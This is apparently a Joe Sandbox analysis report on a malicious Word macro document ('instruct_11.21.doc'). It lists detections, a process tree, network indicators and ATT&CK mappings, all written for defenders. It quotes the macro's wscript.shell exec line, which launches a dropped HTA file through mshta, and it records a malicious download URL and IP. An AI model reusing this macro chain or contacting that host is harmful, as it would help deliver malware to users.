Loading ...

Play interactive tourEdit tour

Windows Analysis Report instruct_11.21.doc.vir

Overview

General Information

Sample Name:instruct_11.21.doc.vir (renamed file extension from vir to docm)
Analysis ID:520837
MD5:a9490d94cf547e27dcc0d52dc72e74e7
SHA1:a00e440eb13f84c8b8faba5b81a7d85fce2a4074
SHA256:ee103f8d64cd8fa884ff6a041db2f7aa403c502f54e26337c606044c2f205394
Tags:docmaldocsansiscvba
Infos:

Most interesting Screenshot:

Detection

Score:84
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Document contains an embedded VBA macro which may execute processes
Document contains an embedded VBA macro with suspicious strings
Sigma detected: Suspicious MSHTA Process Patterns
Document exploit detected (process start blacklist hit)
Machine Learning detection for sample
Document contains no OLE stream with summary information
Queries the volume information (name, serial number etc) of a device
Potential document exploit detected (unknown TCP traffic)
Searches for the Microsoft Outlook file path
Document has an unknown application name
May sleep (evasive loops) to hinder dynamic analysis
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Internet Provider seen in connection with other malware
Creates a window with clipboard capturing capabilities
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Potential document exploit detected (performs DNS queries)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Classification

Process Tree

  • System is w7x64
  • WINWORD.EXE (PID: 668 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
    • explorer.exe (PID: 2916 cmdline: c:\windows\explorer c:\users\public\powPowNext.hta MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
  • explorer.exe (PID: 2840 cmdline: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
    • mshta.exe (PID: 2564 cmdline: "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Public\powPowNext.hta" MD5: ABDFC692D9FE43E2BA8FE6CB5A8CB95A)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

System Summary:

barindex
Sigma detected: Suspicious MSHTA Process PatternsShow sources
Source: Process startedAuthor: Florian Roth: Data: Command: "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Public\powPowNext.hta" , CommandLine: "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Public\powPowNext.hta" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\mshta.exe, NewProcessName: C:\Windows\SysWOW64\mshta.exe, OriginalFileName: C:\Windows\SysWOW64\mshta.exe, ParentCommandLine: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 2840, ProcessCommandLine: "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Public\powPowNext.hta" , ProcessId: 2564

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Multi AV Scanner detection for submitted fileShow sources
Source: instruct_11.21.doc.docmVirustotal: Detection: 49%Perma Link
Antivirus detection for URL or domainShow sources
Source: http://shoulderelliottd.com/boolk/QlaJk8C6vYqIyEwbdypBHv3yJR/wrWWNCD/77427/bebys8?cid=Bm9cAP&wP8zhkKAvira URL Cloud: Label: malware
Multi AV Scanner detection for domain / URLShow sources
Source: shoulderelliottd.comVirustotal: Detection: 9%Perma Link
Machine Learning detection for sampleShow sources
Source: instruct_11.21.doc.docmJoe Sandbox ML: detected
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Software Vulnerabilities:

barindex
Document exploit detected (process start blacklist hit)Show sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\explorer.exe
Source: global trafficTCP traffic: 192.168.2.22:49167 -> 194.62.42.144:80
Source: global trafficDNS query: name: shoulderelliottd.com
Source: global trafficTCP traffic: 192.168.2.22:49167 -> 194.62.42.144:80
Source: Joe Sandbox ViewASN Name: ZEISS-ASRU ZEISS-ASRU
Source: mshta.exe, 00000003.00000002.474416428.00000000065D0000.00000004.00000001.sdmpString found in binary or memory: /moc.nideknil.wwwwww.linkedin.com equals www.linkedin.com (Linkedin)
Source: mshta.exe, 00000003.00000002.474416428.00000000065D0000.00000004.00000001.sdmpString found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
Source: mshta.exe, 00000003.00000002.473630093.0000000003367000.00000002.00020000.sdmpString found in binary or memory: http://localizability/practices/XML.asp
Source: mshta.exe, 00000003.00000002.473630093.0000000003367000.00000002.00020000.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: explorer.exe, 00000001.00000002.410504275.0000000001CC0000.00000002.00020000.sdmp, explorer.exe, 00000002.00000002.411364891.0000000001DF0000.00000002.00020000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: mshta.exe, 00000003.00000002.473630093.0000000003367000.00000002.00020000.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: mshta.exe, 00000003.00000003.472292632.0000000005B00000.00000004.00000040.sdmpString found in binary or memory: http://shoulderelliottd.com/boolk/QlaJk8C6vYqIyEwbdypBHv3yJR/wrWWNCD/77427/bebys8?cid=Bm9cAP&wP8zhkK
Source: mshta.exe, 00000003.00000002.473630093.0000000003367000.00000002.00020000.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: explorer.exe, 00000001.00000002.410504275.0000000001CC0000.00000002.00020000.sdmp, explorer.exe, 00000002.00000002.411364891.0000000001DF0000.00000002.00020000.sdmpString found in binary or memory: http://www.%s.comPA
Source: mshta.exe, 00000003.00000002.473630093.0000000003367000.00000002.00020000.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{A92381E7-919A-4DD3-B53A-282AF29674DF}.tmpJump to behavior
Source: unknownDNS traffic detected: queries for: shoulderelliottd.com
Source: C:\Windows\SysWOW64\mshta.exeWindow created: window name: CLIPBRDWNDCLASS

System Summary:

barindex
Document contains an embedded VBA macro which may execute processesShow sources
Source: instruct_11.21.doc.docmOLE, VBA macro line: dowYouKarol.exec "c:\windows\explorer " & dowGirlLoad
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function s, API IWshShell3.exec("c:\windows\explorer c:\users\public\powPowNext.hta")
Document contains an embedded VBA macro with suspicious stringsShow sources
Source: instruct_11.21.doc.docmOLE, VBA macro line: Set dowYouKarol = CreateObject("wscript.shell")
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function s, String wscript: Set dowYouKarol = CreateObject("wscript.shell")
Source: instruct_11.21.doc.docmOLE indicator has summary info: false
Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: instruct_11.21.doc.docmOLE indicator application name: unknown
Source: instruct_11.21.doc.docmOLE, VBA macro line: Sub document_open()
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function document_open
Source: instruct_11.21.doc.docmOLE indicator, VBA macros: true
Source: C:\Windows\SysWOW64\mshta.exeMemory allocated: 76F90000 page execute and read and write
Source: C:\Windows\SysWOW64\mshta.exeMemory allocated: 76E90000 page execute and read and write
Source: instruct_11.21.doc.docmVirustotal: Detection: 49%
Source: C:\Windows\explorer.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\explorer.exe c:\windows\explorer c:\users\public\powPowNext.hta
Source: unknownProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\mshta.exe "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Public\powPowNext.hta"
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\explorer.exe c:\windows\explorer c:\users\public\powPowNext.hta
Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\mshta.exe "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Public\powPowNext.hta"
Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$struct_11.21.doc.docmJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRD1EE.tmpJump to behavior
Source: classification engineClassification label: mal84.expl.winDOCM@6/16@1/1
Source: instruct_11.21.doc.docmOLE document summary: title field not present or empty
Source: instruct_11.21.doc.docmOLE document summary: edited time not present or 0
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\explorer.exe
Source: unknownProcess created: C:\Windows\explorer.exe
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\explorer.exe
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: instruct_11.21.doc.docmInitial sample: OLE summary keywords = ath.txeNwoPwop\cilbup\sresu\:c
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe TID: 2032Thread sleep time: -60000s >= -30000s
Source: C:\Windows\explorer.exe TID: 2032Thread sleep time: -60000s >= -30000s
Source: C:\Windows\explorer.exe TID: 2712Thread sleep time: -60000s >= -30000s
Source: C:\Windows\SysWOW64\mshta.exe TID: 2808Thread sleep time: -120000s >= -30000s
Source: explorer.exe, 00000002.00000003.408701243.000000000029B000.00000004.00000001.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: C:\Windows\SysWOW64\mshta.exeMemory protected: page read and write | page guard
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformation
Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsScripting22Path InterceptionProcess Injection1Masquerading1OS Credential DumpingSecurity Software Discovery1Remote ServicesEmail Collection1Exfiltration Over Other Network MediumIngress Tool Transfer1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsExploitation for Client Execution12Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsVirtualization/Sandbox Evasion1LSASS MemoryVirtualization/Sandbox Evasion1Remote Desktop ProtocolClipboard Data1Exfiltration Over BluetoothNon-Application Layer Protocol1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Disable or Modify Tools1Security Account ManagerRemote System Discovery1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationApplication Layer Protocol1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection1NTDSFile and Directory Discovery1Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptScripting22LSA SecretsSystem Information Discovery14SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 520837 Sample: instruct_11.21.doc.vir Startdate: 12/11/2021 Architecture: WINDOWS Score: 84 17 Multi AV Scanner detection for domain / URL 2->17 19 Antivirus detection for URL or domain 2->19 21 Multi AV Scanner detection for submitted file 2->21 23 5 other signatures 2->23 6 explorer.exe 2->6         started        8 WINWORD.EXE 56 27 2->8         started        process3 process4 10 mshta.exe 12 6->10         started        13 explorer.exe 1 8->13         started        dnsIp5 15 shoulderelliottd.com 194.62.42.144, 80 ZEISS-ASRU Russian Federation 10->15

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
instruct_11.21.doc.docm49%VirustotalBrowse
instruct_11.21.doc.docm100%Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

SourceDetectionScannerLabelLink
shoulderelliottd.com10%VirustotalBrowse

URLs

SourceDetectionScannerLabelLink
http://www.%s.comPA0%URL Reputationsafe
http://www.icra.org/vocabulary/.0%URL Reputationsafe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
http://shoulderelliottd.com/boolk/QlaJk8C6vYqIyEwbdypBHv3yJR/wrWWNCD/77427/bebys8?cid=Bm9cAP&wP8zhkK100%Avira URL Cloudmalware

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
shoulderelliottd.com
194.62.42.144
truetrueunknown

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Checkmshta.exe, 00000003.00000002.473630093.0000000003367000.00000002.00020000.sdmpfalse
    high
    http://www.%s.comPAexplorer.exe, 00000001.00000002.410504275.0000000001CC0000.00000002.00020000.sdmp, explorer.exe, 00000002.00000002.411364891.0000000001DF0000.00000002.00020000.sdmpfalse
    • URL Reputation: safe
    low
    http://www.icra.org/vocabulary/.mshta.exe, 00000003.00000002.473630093.0000000003367000.00000002.00020000.sdmpfalse
    • URL Reputation: safe
    unknown
    http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.explorer.exe, 00000001.00000002.410504275.0000000001CC0000.00000002.00020000.sdmp, explorer.exe, 00000002.00000002.411364891.0000000001DF0000.00000002.00020000.sdmpfalse
      high
      http://windowsmedia.com/redir/services.asp?WMPFriendly=truemshta.exe, 00000003.00000002.473630093.0000000003367000.00000002.00020000.sdmpfalse
      • URL Reputation: safe
      unknown
      http://shoulderelliottd.com/boolk/QlaJk8C6vYqIyEwbdypBHv3yJR/wrWWNCD/77427/bebys8?cid=Bm9cAP&wP8zhkKmshta.exe, 00000003.00000003.472292632.0000000005B00000.00000004.00000040.sdmptrue
      • Avira URL Cloud: malware
      unknown

      Contacted IPs

      • No. of IPs < 25%
      • 25% < No. of IPs < 50%
      • 50% < No. of IPs < 75%
      • 75% < No. of IPs

      Public

      IPDomainCountryFlagASNASN NameMalicious
      194.62.42.144
      shoulderelliottd.comRussian Federation
      34464ZEISS-ASRUtrue

      General Information

      Joe Sandbox Version:34.0.0 Boulder Opal
      Analysis ID:520837
      Start date:12.11.2021
      Start time:20:59:09
      Joe Sandbox Product:CloudBasic
      Overall analysis duration:0h 12m 36s
      Hypervisor based Inspection enabled:false
      Report type:light
      Sample file name:instruct_11.21.doc.vir (renamed file extension from vir to docm)
      Cookbook file name:defaultwindowsofficecookbook.jbs
      Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
      Number of analysed new started processes analysed:103
      Number of new started drivers analysed:0
      Number of existing processes analysed:0
      Number of existing drivers analysed:0
      Number of injected processes analysed:0
      Technologies:
      • HCA enabled
      • EGA enabled
      • HDC enabled
      • GSI enabled (VBA)
      • AMSI enabled
      Analysis Mode:default
      Analysis stop reason:Timeout
      Detection:MAL
      Classification:mal84.expl.winDOCM@6/16@1/1
      EGA Information:Failed
      HDC Information:Failed
      HCA Information:
      • Successful, ratio: 100%
      • Number of executed functions: 0
      • Number of non-executed functions: 0
      Cookbook Comments:
      • Adjust boot time
      • Enable AMSI
      Warnings:
      Show All
      • Max analysis timeout: 600s exceeded, the analysis took too long
      • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, mscorsvw.exe, svchost.exe
      • Excluded IPs from analysis (whitelisted): 67.27.157.126, 8.248.139.254, 8.253.95.249, 8.253.204.249, 67.27.158.126
      • Excluded domains from analysis (whitelisted): fg.download.windowsupdate.com.c.footprint.net, wu-shim.trafficmanager.net, ctldl.windowsupdate.com
      • Not all processes where analyzed, report is missing behavior information
      • Report size getting too big, too many NtOpenKeyEx calls found.
      • Report size getting too big, too many NtQueryAttributesFile calls found.
      • Report size getting too big, too many NtQueryValueKey calls found.

      Simulations

      Behavior and APIs

      TimeTypeDescription
      20:59:18API Interceptor30x Sleep call for process: explorer.exe modified
      20:59:20API Interceptor55x Sleep call for process: mshta.exe modified

      Joe Sandbox View / Context

      IPs

      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
      194.62.42.144particulars 11.010.2021.docGet hashmaliciousBrowse
      • shoulderelliottd.com/boolk/QlaJk8C6vYqIyEwbdypBHv3yJR/wrWWNCD/77427/bebys8?cid=Bm9cAP&wP8zhkK=aNLC3bJChZM5GauIB&=S0MRS72jqtkORxKA3iUkjdS
      particulars 11.010.2021.docGet hashmaliciousBrowse
      • shoulderelliottd.com/boolk/QlaJk8C6vYqIyEwbdypBHv3yJR/wrWWNCD/77427/bebys8?cid=Bm9cAP&wP8zhkK=aNLC3bJChZM5GauIB&=S0MRS72jqtkORxKA3iUkjdS
      jk2BhrWvzs.docmGet hashmaliciousBrowse
      • shoulderelliottd.com/boolk/QlaJk8C6vYqIyEwbdypBHv3yJR/wrWWNCD/77427/bebys8?cid=Bm9cAP&wP8zhkK=aNLC3bJChZM5GauIB&=S0MRS72jqtkORxKA3iUkjdS
      jk2BhrWvzs.docmGet hashmaliciousBrowse
      • shoulderelliottd.com/boolk/QlaJk8C6vYqIyEwbdypBHv3yJR/wrWWNCD/77427/bebys8?cid=Bm9cAP&wP8zhkK=aNLC3bJChZM5GauIB&=S0MRS72jqtkORxKA3iUkjdS

      Domains

      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
      shoulderelliottd.comparticulars 11.010.2021.docGet hashmaliciousBrowse
      • 194.62.42.144
      particulars 11.010.2021.docGet hashmaliciousBrowse
      • 194.62.42.144
      jk2BhrWvzs.docmGet hashmaliciousBrowse
      • 194.62.42.144
      jk2BhrWvzs.docmGet hashmaliciousBrowse
      • 194.62.42.144

      ASN

      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
      ZEISS-ASRUparticulars 11.010.2021.docGet hashmaliciousBrowse
      • 194.62.42.144
      particulars 11.010.2021.docGet hashmaliciousBrowse
      • 194.62.42.144
      inquiry-11.21.docGet hashmaliciousBrowse
      • 194.62.42.45
      inquiry-11.21.docGet hashmaliciousBrowse
      • 194.62.42.45
      inquiry-11.21.docGet hashmaliciousBrowse
      • 194.62.42.45
      bE5TVG6QkV.docmGet hashmaliciousBrowse
      • 194.62.42.31
      bE5TVG6QkV.docmGet hashmaliciousBrowse
      • 194.62.42.31
      pZt5P80bs1.docmGet hashmaliciousBrowse
      • 194.62.42.143
      pZt5P80bs1.docmGet hashmaliciousBrowse
      • 194.62.42.143
      jk2BhrWvzs.docmGet hashmaliciousBrowse
      • 194.62.42.144
      jk2BhrWvzs.docmGet hashmaliciousBrowse
      • 194.62.42.144
      e6vHWtg9cC.docmGet hashmaliciousBrowse
      • 194.62.42.42
      e6vHWtg9cC.docmGet hashmaliciousBrowse
      • 194.62.42.42
      4htQNyKQ9P.docmGet hashmaliciousBrowse
      • 194.62.42.116
      oNmDvNFrqi.docmGet hashmaliciousBrowse
      • 194.62.42.116
      4htQNyKQ9P.docmGet hashmaliciousBrowse
      • 194.62.42.116
      oNmDvNFrqi.docmGet hashmaliciousBrowse
      • 194.62.42.116
      oNmDvNFrqi.docmGet hashmaliciousBrowse
      • 194.62.42.116
      eeJ9i33NTw.docmGet hashmaliciousBrowse
      • 194.62.42.116
      eeJ9i33NTw.docmGet hashmaliciousBrowse
      • 194.62.42.116

      JA3 Fingerprints

      No context

      Dropped Files

      No context

      Created / dropped Files

      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\warning[1]
      Process:C:\Windows\SysWOW64\mshta.exe
      File Type:GIF image data, version 89a, 36 x 38
      Category:dropped
      Size (bytes):1062
      Entropy (8bit):4.517838839626174
      Encrypted:false
      SSDEEP:12:z4ENetWsdvCMtkEFk+t2cd3ikIbOViGZVsMLfE4DMWUcC/GFvyVEZd6vcmadxVtS:nA/ag/QSi6/LKZzqKVQgJOexQkYfG6E
      MD5:124A9E7B6976F7570134B7034EE28D2B
      SHA1:E889BFC2A2E57491016B05DB966FC6297A174F55
      SHA-256:5F95EFF2BCAAEA82D0AE34A007DE3595C0D830AC4810EA4854E6526E261108E9
      SHA-512:EA1B3CC56BD41FC534AAC00F186180345CB2C06705B57C88C8A6953E6CE8B9A2E3809DDB01DAAC66FA9C424D517D2D14FA45FBEF9D74FEF8A809B71550C7C145
      Malicious:false
      Reputation:moderate, very likely benign file
